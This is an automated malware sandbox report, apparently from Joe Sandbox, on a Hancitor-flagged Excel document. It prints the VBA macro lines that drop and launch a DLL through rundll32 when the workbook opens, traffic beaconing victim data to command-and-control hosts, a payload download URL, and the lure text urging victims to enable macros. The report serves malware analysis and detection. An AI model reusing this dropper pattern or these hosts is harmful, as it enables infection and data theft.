                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341FE0 InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,5_2_00341FE0
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3ECECA93.emfJump to behavior
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /7hsjfd9w4refsd.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: s0lom0n.ruCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                  Source: svchost.exe, 00000007.00000002.2132921997.000000000022B000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                  Source: unknownDNS traffic detected: queries for: api.ipify.org
                  Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: tholeferli.comContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: http://aidgodown.ru/8/forum.php
                  Source: rundll32.exeString found in binary or memory: http://api.ipify.org
                  Source: svchost.exe, 00000007.00000002.2132894094.00000000001F4000.00000004.00000020.sdmpString found in binary or memory: http://api.ipify.org/?format=xml
                  Source: rundll32.exe, 00000005.00000003.2121584965.00000000001D0000.00000040.00000001.sdmp, rundll32.exe, 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmpString found in binary or memory: http://relifleappin.ru/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                  Source: rundll32.exe, 00000005.00000002.2348826017.00000000005AC000.00000004.00000020.sdmp, rundll32.exe, 00000005.00000002.2348733440.000000000051D000.00000004.00000020.sdmpString found in binary or memory: http://tholeferli.com/8/forum.php
                  Source: rundll32.exe, 00000005.00000002.2348788273.0000000000553000.00000004.00000020.sdmpString found in binary or memory: http://tholeferli.com/8/forum.phponnect
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                  Source: rundll32.exe, 00000005.00000002.2349914383.0000000003050000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                  Source: rundll32.exe, 00000004.00000002.2349091460.0000000001D07000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349407298.0000000002317000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                  Source: rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                  System Summary:

                  barindex
                  Malicious sample detected (through community Yara rule)Show sources
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                  Source: Screenshot number: 4Screenshot OCR: Enable editing button from the yellow bar above 19 ' Once you have enabled editing, please click
                  Source: Screenshot number: 4Screenshot OCR: Enable content button 21 ,, from the yellow bar above 23 24 25 26 27 28 29 30 31 32 ::(
                  Document contains OLE streams with PE executablesShow sources
                  Source: 0722_2857746751.xlsStream path 'MBD0132A5F4/\x1Ole10Native' : MZ signature found
                  Document contains an embedded VBA macro which may execute processesShow sources
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Document contains an embedded VBA macro with suspicious stringsShow sources
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Name pafs As Environ$("temp") & "\" & "omsh.dll"
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Declare PtrSafe Function fffz Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                  Source: 0722_2857746751.xlsOLE, VBA macro line: vcbc = Environ$("temp")
                  Source: 0722_2857746751.xlsOLE, VBA macro line: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1
                  Source: 0722_2857746751.xlsOLE, VBA macro line: usx = Environ$("temp")
                  Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function nam, String environ: Name pafs As Environ$("temp") & "\" & "omsh.dll"Name: nam
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: vcbc = Environ$("temp")Name: Workbook_Open
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_Open, String environ: fffz 0, vbNullString, "rundl" & "l32", Environ$("temp") & "\omsh.dll,SHIIJGLGNAB", vbNullString, 1Name: Workbook_Open
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function xxx, String environ: usx = Environ$("temp")Name: xxx
                  Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)Show sources
                  Source: 0722_2857746751.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions exec, run, environ
                  Office process drops PE fileShow sources
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\532.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004293B0: GetFileInformationByHandle,DeviceIoControl,7_2_004293B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034E0005_2_0034E000
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_003534B05_2_003534B0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035639C5_2_0035639C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E85F7_2_0040E85F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004158007_2_00415800
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040F9C07_2_0040F9C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004122DD7_2_004122DD
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004220F87_2_004220F8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004251417_2_00425141
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042D9727_2_0042D972
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F1017_2_0042F101
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004261C47_2_004261C4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004221DF7_2_004221DF
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004302687_2_00430268
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040727F7_2_0040727F
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042FA0C7_2_0042FA0C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040B2F37_2_0040B2F3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042FB2C7_2_0042FB2C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00432BF47_2_00432BF4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040A3A47_2_0040A3A4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042F4457_2_0042F445
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004204087_2_00420408
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00430C087_2_00430C08
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004314CB7_2_004314CB
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409CE57_2_00409CE5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042E4B77_2_0042E4B7
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042057D7_2_0042057D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004145067_2_00414506
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00406D107_2_00406D10
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004305237_2_00430523
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042DDCA7_2_0042DDCA
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00409DD87_2_00409DD8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042FE027_2_0042FE02
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00430E227_2_00430E22
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00432E3A7_2_00432E3A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042E6E27_2_0042E6E2
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042EEA07_2_0042EEA0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040A71A7_2_0040A71A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0042EFC57_2_0042EFC5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040BFEF7_2_0040BFEF
                  Source: 0722_2857746751.xlsOLE, VBA macro line: Private Sub Workbook_Open()
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function Workbook_OpenName: Workbook_Open
                  Source: 0722_2857746751.xlsOLE indicator, VBA macros: true
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\532.dll 8EFAC1531E83525BB0806EEBCA0BB9A797A18FEB1848A4CEEE4A88FDB85CBBBD
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0034DFA0 appears 41 times
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeSection loaded: imjp12k.dllJump to behavior
                  Source: 5.3.rundll32.exe.1d438c.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.3.rundll32.exe.1d438c.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: 5.2.rundll32.exe.340000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                  Source: rundll32.exe, 00000004.00000002.2348635367.0000000001B20000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2349163400.0000000002130000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@9/7@7/5
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,7_2_00415800
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\IMJP10Jump to behavior
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeMutant created: \Sessions\1\BaseNamedObjects\{6597B945-4806-49df-9D96-BABAB5D250A7}
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD5C.tmpJump to behavior
                  Source: 0722_2857746751.xlsOLE indicator, Workbook stream: true
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\IME\IMEJP10\imjppdmg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: 0722_2857746751.xlsVirustotal: Detection: 29%
                  Source: 0722_2857746751.xlsReversingLabs: Detection: 22%
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe /Migration
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNAB
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\IME\IMEJP10\imjppdmg.exe /MigrationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNABJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\omsh.dll,SHIIJGLGNABJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exeJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                  Source: Binary string: c:\Star\danger\Air_Night\recei\Paragraph.pdb source: rundll32.exe, 00000005.00000002.2348584640.0000000000359000.00000002.00020000.sdmp, 0722_2857746751.xls
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00343580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034C6F3 push ecx; ret 5_2_0034C706
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034DFE5 push ecx; ret 5_2_0034DFF8
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036F992 push ecx; retf 5_2_0036F993
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00435E20 push dword ptr [eax+04h]; ret 7_2_00435E4F
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\532.dllJump to dropped file
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\532.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-9703
                  Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-8525
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 2324Thread sleep time: -240000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343400 GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,5_2_00343400
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_5-9256
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0034D00F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0034D00F
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00343580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_00343580
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036EAD1 mov eax, dword ptr fs:[00000030h]5_2_0036EAD1
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036E607 push dword ptr fs:[00000030h]5_2_0036E607
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0036EA00 mov eax, dword ptr fs:[00000030h]5_2_0036EA00
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_00341390 GetProcessHeap,RtlAllocateHeap,5_2_00341390
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0035203E __decode_pointer,SetUnhandledExceptionFilter,5_2_0035203E
